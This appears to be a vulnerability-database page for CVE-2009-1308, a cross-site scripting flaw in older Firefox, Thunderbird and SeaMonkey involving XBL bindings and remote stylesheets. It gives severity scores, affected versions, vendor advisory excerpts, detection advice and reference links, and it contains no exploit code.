CVE-2009-1308
published 2009-04-22CVE-2009-1308: Cross-site scripting (XSS) vulnerability in Mozilla Firefox before 3.0.9, Thunderbird, and SeaMonkey allows remote attackers to inject arbitrary web script or…
PriorityP273medium4.3CVSS 2.0
AVNACMAuNCNIPAN
ITWVulnCheck KEV
Exploited in the wild
EPSS
2.29%
81.0th percentile
Cross-site scripting (XSS) vulnerability in Mozilla Firefox before 3.0.9, Thunderbird, and SeaMonkey allows remote attackers to inject arbitrary web script or HTML via vectors involving XBL JavaScript bindings and remote stylesheets, as exploited in the wild by a March 2009 eBay listing.
Affected
88 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mozilla | firefox | <= 3.0.8 | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →XSS via XBL JavaScript bindings combined with remote/third-party stylesheets — restrict or alert on cross-origin XBL binding loads in Firefox/SeaMonkey/Thunderbird versions prior to 3.0.9 ↗
- →The vulnerability was exploited in the wild via a malicious eBay listing in March 2009; monitor for XBL binding references in user-supplied stylesheet content on web platforms ↗
- ·Mozilla mitigated this by enforcing same-origin policy for XBL bindings; the vulnerability only applies to Firefox before 3.0.9, Thunderbird, and SeaMonkey without this restriction ↗
- ·Affected products include Mozilla Firefox before 3.0.9, Thunderbird (unversioned at time of advisory), and SeaMonkey; patched packages include firefox-3.0.9 and xulrunner-1.9.0.9 ↗
CVSS provenance
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:N/I:P/A:N
vulncheck4.3MEDIUM
vendor_ubuntu5.8MEDIUM
vendor_redhat4.3MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Ubuntu
Thunderbird vulnerabilities
vendor_ubuntu·2009-06-25·CVSS 5.0
CVE-2009-1303 [MEDIUM] Thunderbird vulnerabilities
Title: Thunderbird vulnerabilities
Summary: Thunderbird vulnerabilities
Several flaws were discovered in the JavaScript engine of Thunderbird. If a
user had JavaScript enabled and were tricked into viewing malicious web
content, a remote attacker could cause a denial of service or possibly
execute arbitrary code with the privileges of the user invoking the
program. (CVE-2009-1303, CVE-2009-1305, CVE-2009-1392, CVE-2009-1833,
CVE-2009-1838)
Several flaws were discovered in the way Thunderbird processed malformed
URI schemes. If a user were tricked into viewing a malicious website and
had JavaScript and plugins enabled, a remote attacker could execute
arbitrary JavaScript or steal private data. (CVE-2009-1306, CVE-2009-1307,
CVE-2009-1309)
Cefn Hoile discovered Thunderbird did not adequa
Ubuntu
Firefox and Xulrunner vulnerabilities
vendor_ubuntu·2009-04-23·CVSS 5.8
CVE-2009-1302 [MEDIUM] Firefox and Xulrunner vulnerabilities
Title: Firefox and Xulrunner vulnerabilities
Summary: Firefox and Xulrunner vulnerabilities
Several flaws were discovered in the browser engine. If a user were tricked
into viewing a malicious website, a remote attacker could cause a denial of
service or possibly execute arbitrary code with the privileges of the user
invoking the program. (CVE-2009-1302, CVE-2009-1303, CVE-2009-1304,
CVE-2009-1305)
It was discovered that Firefox displayed certain Unicode characters which
could be visually confused with punctuation in valid web addresses in the
location bar. An attacker could exploit this to spoof the location bar,
such as in a phishing attack. (CVE-2009-0652)
Several flaws were discovered in the way Firefox processed malformed URI
schemes. If a user were tricked into viewing a maliciou
Red Hat
Firefox XSS hazard using third-party stylesheets and XBL bindings
vendor_redhat·2009-04-21·CVSS 4.3
CVE-2009-1308 [MEDIUM] CWE-79 Firefox XSS hazard using third-party stylesheets and XBL bindings
Firefox XSS hazard using third-party stylesheets and XBL bindings
Cross-site scripting (XSS) vulnerability in Mozilla Firefox before 3.0.9, Thunderbird, and SeaMonkey allows remote attackers to inject arbitrary web script or HTML via vectors involving XBL JavaScript bindings and remote stylesheets, as exploited in the wild by a March 2009 eBay listing.
GHSA
GHSA-chqp-7f63-6c5w: Cross-site scripting (XSS) vulnerability in Mozilla Firefox before 3
ghsa_unreviewed·2022-05-02
CVE-2009-1308 [MEDIUM] CWE-79 GHSA-chqp-7f63-6c5w: Cross-site scripting (XSS) vulnerability in Mozilla Firefox before 3
Cross-site scripting (XSS) vulnerability in Mozilla Firefox before 3.0.9, Thunderbird, and SeaMonkey allows remote attackers to inject arbitrary web script or HTML via vectors involving XBL JavaScript bindings and remote stylesheets, as exploited in the wild by a March 2009 eBay listing.
VulnCheck
Mozilla Firefox Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
vulncheck·2009·CVSS 4.3
CVE-2009-1308 [MEDIUM] Mozilla Firefox Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Mozilla Firefox Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Cross-site scripting (XSS) vulnerability in Mozilla Firefox before 3.0.9, Thunderbird, and SeaMonkey allows remote attackers to inject arbitrary web script or HTML via vectors involving XBL JavaScript bindings and remote stylesheets, as exploited in the wild by a March 2009 eBay listing.
Affected: Mozilla Firefox
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://nvd.nist.gov/vuln/detail/CVE-2009-1308; https://www.cve.org/CVERecord?id=CVE-2009-1308
No detection rules found.
No public exploits indexed.
http://lists.opensuse.org/opensuse-security-announce/2009-05/msg00000.htmlhttp://secunia.com/advisories/34758http://secunia.com/advisories/34780http://secunia.com/advisories/34843http://secunia.com/advisories/34894http://secunia.com/advisories/35042http://secunia.com/advisories/35065http://secunia.com/advisories/35536http://sunsolve.sun.com/search/document.do?assetkey=1-66-264308-1http://www.debian.org/security/2009/dsa-1797http://www.mandriva.com/security/advisories?name=MDVSA-2009:111http://www.mandriva.com/security/advisories?name=MDVSA-2009:141http://www.mozilla.org/security/announce/2009/mfsa2009-18.htmlhttp://www.redhat.com/support/errata/RHSA-2009-0436.htmlhttp://www.redhat.com/support/errata/RHSA-2009-1126.htmlhttp://www.securityfocus.com/bid/34656http://www.securitytracker.com/id?1022097http://www.theregister.co.uk/2009/03/08/ebay_scam_wizardy/http://www.ubuntu.com/usn/usn-782-1http://www.vupen.com/english/advisories/2009/1125https://bugzilla.mozilla.org/show_bug.cgi?id=481558https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10428https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A6173https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A6185https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A6296https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A7285https://usn.ubuntu.com/764-1/https://www.redhat.com/archives/fedora-package-announce/2009-April/msg00683.htmlhttp://lists.opensuse.org/opensuse-security-announce/2009-05/msg00000.htmlhttp://secunia.com/advisories/34758http://secunia.com/advisories/34780http://secunia.com/advisories/34843http://secunia.com/advisories/34894http://secunia.com/advisories/35042http://secunia.com/advisories/35065http://secunia.com/advisories/35536http://sunsolve.sun.com/search/document.do?assetkey=1-66-264308-1http://www.debian.org/security/2009/dsa-1797http://www.mandriva.com/security/advisories?name=MDVSA-2009:111http://www.mandriva.com/security/advisories?name=MDVSA-2009:141http://www.mozilla.org/security/announce/2009/mfsa2009-18.htmlhttp://www.redhat.com/support/errata/RHSA-2009-0436.htmlhttp://www.redhat.com/support/errata/RHSA-2009-1126.htmlhttp://www.securityfocus.com/bid/34656http://www.securitytracker.com/id?1022097http://www.theregister.co.uk/2009/03/08/ebay_scam_wizardy/http://www.ubuntu.com/usn/usn-782-1http://www.vupen.com/english/advisories/2009/1125https://bugzilla.mozilla.org/show_bug.cgi?id=481558https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10428https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A6173https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A6185https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A6296https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A7285https://usn.ubuntu.com/764-1/https://www.redhat.com/archives/fedora-package-announce/2009-April/msg00683.html
2009-04-22
Published
Exploited in the wild